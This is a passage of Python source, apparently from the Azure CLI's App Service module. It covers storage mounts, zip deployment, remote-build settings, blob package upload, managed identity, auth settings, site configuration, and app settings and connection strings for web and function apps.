raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = UA_AGENT
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ce:
# This SDK function throws an error if Status Code is 200
if ce.status_code != 200:
raise ce
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity')
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity')
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': UA_AGENT
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
